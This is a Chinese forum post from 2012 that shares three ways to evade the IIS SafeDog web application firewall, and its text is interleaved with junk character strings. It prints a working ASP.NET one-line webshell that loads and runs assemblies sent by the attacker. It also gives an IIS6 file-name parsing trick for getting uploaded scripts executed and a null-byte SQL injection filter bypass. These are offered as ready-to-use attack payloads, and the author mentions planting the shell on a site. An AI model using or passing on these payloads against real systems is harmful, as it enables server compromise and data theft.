1、绕过IIS安全狗的一句话。
8 U( Z5 t2 I$ Z, W( t( `8 x$ n前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
% G+ I# ~, S- L0 _& r<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
! x9 U. l7 b( q9 `# n C$ {& T0 }% {, z7 z5 }8 d& y6 V' z2 \
2、IIS6.0解析漏洞遇到安全狗。
1 {' N4 m0 S* J' t- }! ^+ A文件名为
1 g% v5 D, M _0 Y; w/ a/ |9 bhttp://www.xxxxx.com/sh3llc0de.asp;1.jpg4 @4 Y( B! s( Y8 e; F& T; v
+ ]3 F6 y: s2 d. l9 x
这样的会被IIS安全狗果断屏蔽。+ K6 T5 F2 Z7 U
改成如下名称,IIS6一样会解析:! j: y6 V6 X5 x; `5 q* M
www.xxxxx.com/;1.asp;1.jpg+ m r+ u V1 }' x# g- f
2 d; `3 M1 q0 {( g2 u' j* F4 G& Z
3、安全狗的注入绕过。
3 u4 {& m M! u& f/ v常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。; C* e% y2 o! x2 n
但如果:1 q8 G+ `+ [/ r' m* w% |
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
) [( F# x6 A, @0 o0 [* F就可以成功绕过了。
% [9 C' {6 R' i, w9 V A# N/ S9 `0 ?6 v$ A+ o( X2 D
[! u8 i- B/ ]2 F6 a |
发表于 2012-10-31 08:25:30
收藏
支持
反对